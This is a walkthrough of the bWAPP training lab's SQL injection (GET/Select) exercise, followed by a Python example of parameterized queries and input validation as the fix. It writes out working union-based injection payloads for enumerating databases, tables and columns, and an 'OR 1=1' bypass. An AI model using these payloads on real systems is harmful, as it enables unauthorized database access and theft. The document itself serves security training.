In this walkthrough, we will go through the SQL Injection (GET/Select) vulnerability section of bWAPP Labs. We will explore and exploit SQL injection in a GET request driven by a select control and learn how applications are affected by it. So, let's get started with the hacking without any delay.
Security: Low
- Setting the security level to Low.
- The application has a select functionality which is used to pick a movie and display information about it. As per the Burp intercept, it issues a GET request to the sqli_2.php file, which in turn displays the output from the DB.
- I used the apostrophe (') at the end of the movie ID, which causes an error. That's good, as it might be vulnerable to SQL injection.
'
- I used the below payload, where I input an out-of-scope movie ID along with a TRUE statement, and got a positive response.
999+OR+1=1--+-
- Next, I found the number of columns using the below payloads. We will start by checking the number of columns in the database. For that, we used the ORDER BY clause. As we can see, we hit an "Unknown column" error on column 8 but no error on column 7. That means there are 7 columns in the DB.
1+ORDER+BY+10--+-
1+ORDER+BY+8--+-
1+ORDER+BY+7--+-
- Let's find out which column can be used to retrieve data. Here, the value in the second column got reflected in the front end.
999+UNION+SELECT+NULL,"asd",NULL,NULL,NULL,NULL,NULL--+-
- Moving on, let’s dump the database name using the below payload.
999+UNION+SELECT+NULL,database(),NULL,NULL,NULL,NULL,NULL--+-
- Now we have our database name “bWAPP”. Let’s find out the tables inside it using the below payload.
999+UNION+SELECT+NULL,table_name,NULL,NULL,NULL,NULL,NULL+from+information_schema.tables+where+table_schema=database()--+-
- We got a table named “blog”, nothing sensational but let’s still check the columns inside it with the below payload.
999+UNION+SELECT+NULL,column_name,NULL,NULL,NULL,NULL,NULL+from+information_schema.columns+where+table_name='blog'--+-
- Got an “id” column. On checking it, found nothing.
999+UNION+SELECT+NULL,id,NULL,NULL,NULL,NULL,NULL+from+blog--+-
Security: Medium
- Setting the security level to Medium.
- I used the below payload and it worked at the Medium level too, as we got a positive response.
9999+OR+1=1;
Security: High
- Setting the security level to High.
- Unable to produce an error at the High level, as the application is using prepared statements.
Conclusion:
So, we finally completed all the security levels for the bWAPP SQL Injection (GET/Select) vulnerability. We looked into how the application has been set up at the various levels and how we can bypass the security controls implemented. Next, we can mitigate potential SQL injection attacks by performing input sanitization and using prepared statements or parameterized queries for every SQL query made by the application to the database. On that note, I will take your leave and will meet you in the next one with another bWAPP vulnerability writeup. Till then, "Keep Hacking".
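
The mitigation named above (prepared statements plus input validation), set beside string-built queries, as an added example that is not part of the original write-up or bWAPP's own code. It uses Python's sqlite3 as a stand-in for the PHP/MySQL lab; the table, sample data, function names and the quote-escaping filter are all assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; the schema is an assumption, not bWAPP's.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO movies VALUES (?, ?)",
                   [(1, "Movie A"), (2, "Movie B"), (3, "Movie C")])
    return db

def lookup_concat(db, movie):
    # Vulnerable: the request parameter becomes part of the SQL text.
    return db.execute("SELECT title FROM movies WHERE id = " + movie).fetchall()

def escape_quotes(value):
    # Hypothetical quote-escaping filter (assumption, not bWAPP's code).
    return value.replace("'", "''")

def lookup_escaped(db, movie):
    # Still vulnerable: the value sits in an unquoted numeric context, so an
    # input that contains no quotes passes through the filter unchanged.
    sql = "SELECT title FROM movies WHERE id = " + escape_quotes(movie)
    return db.execute(sql).fetchall()

def lookup_bound(db, movie):
    # Parameterized: the SQL text is fixed and the input is bound as data.
    return db.execute("SELECT title FROM movies WHERE id = ?", (movie,)).fetchall()

def lookup_validated(db, movie):
    # Input validation in front of the bound query: ASCII digits only.
    if not re.fullmatch(r"[0-9]{1,9}", movie):
        raise ValueError("movie id must be numeric")
    return lookup_bound(db, int(movie))

if __name__ == "__main__":
    db = make_db()
    payload = "999 OR 1=1-- -"  # URL-decoded form of the payload used above
    for fn in (lookup_concat, lookup_escaped, lookup_bound):
        print(fn.__name__, fn(db, payload))
    print("lookup_validated", lookup_validated(db, "2"))
    try:
        lookup_validated(db, payload)
    except ValueError as exc:
        print("lookup_validated rejected input:", exc)
```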